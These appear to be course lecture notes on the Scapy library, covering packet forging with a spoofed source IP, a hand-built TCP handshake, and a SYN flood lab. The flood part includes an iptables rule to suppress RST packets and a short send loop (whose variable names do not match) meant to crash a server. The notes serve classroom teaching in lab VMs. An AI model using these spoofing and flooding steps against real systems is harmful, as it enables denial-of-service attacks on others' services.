IT 4510

Scapy

Note to self: Make sure to allow firewall access from 1.1.1.1 on GAIA

Scapy

  • Sniff, send, dissect and forge network packets.
  • It can replace hping, arpspoof, arp-sk, arping, p0f and even some parts of Nmap, tcpdump, and tshark.
  • sudo apt install python3-scapy
  • must have root permissions on machine you run it on
  • sudo scapy will launch interpreter
  • Or, create a python file like normal and import lib
  • YOU MUST BE USING A VM FROM VM FARM

Scapy basics

  • ls #types of packets you can create
  • lsc #what you can do with them

Example:

    i=IP()
    i.show()
    i.src='1.1.1.1'
    i.dst='144.38.193.245'
    i.show()
    send(i/'lastname')

TCP

Recall a 3 way handshake is:

  • syn ->
  • syn/ack <-
  • ack ->

TCP

Example:

  • TCP sent to port 80 with "syn" set. (This is default for new TCP() objects in scapy. flags=S)
  • Response comes back (flags = SA)
    • sequence number might be 266183140
    • ack number might be 1
  • Ack sent back to server (flags = A)
    • sequence number is equal to the ack of the response (1)
    • ack number set to reponse sequence + 1 (266183141)

Example code

    #!/usr/bin/python
    
    from scapy.all import *
    
    conf.L3socket
    conf.L3socket=L3RawSocket
    
    i=IP()
    i.dst = "computing.utahtech.edu"
    
    t = TCP()
    t.dport = 80
    r = sr1(i/t)
    t.flags = "A"
    t.seq = r.ack
    t.ack = r.seq + 1
    p = i/t
    reply = sr(p)

Syn Flood

We must start with this:

iptables -F; iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP

Otherwise the kernel sends RST packets to target and Syn flood fails. (Because we are sending packets with scapy, and the OS doesn't like this, so it tries to tell the target to ignore the connection)

Syn Flood

If you start too many syn requests to a server and never finish the handshake, you can crash the server.

Code to add:

    for p in range(20000, 20010):
        tcp.sport = p
        send(i/t)

SLowloris

See definition

Remove iptables junk from above:

    iptables -P INPUT ACCEPT
    iptables -P FORWARD ACCEPT
    iptables -P OUTPUT ACCEPT
    iptables -t nat -F
    iptables -t mangle -F
    iptables -F
    iptables -X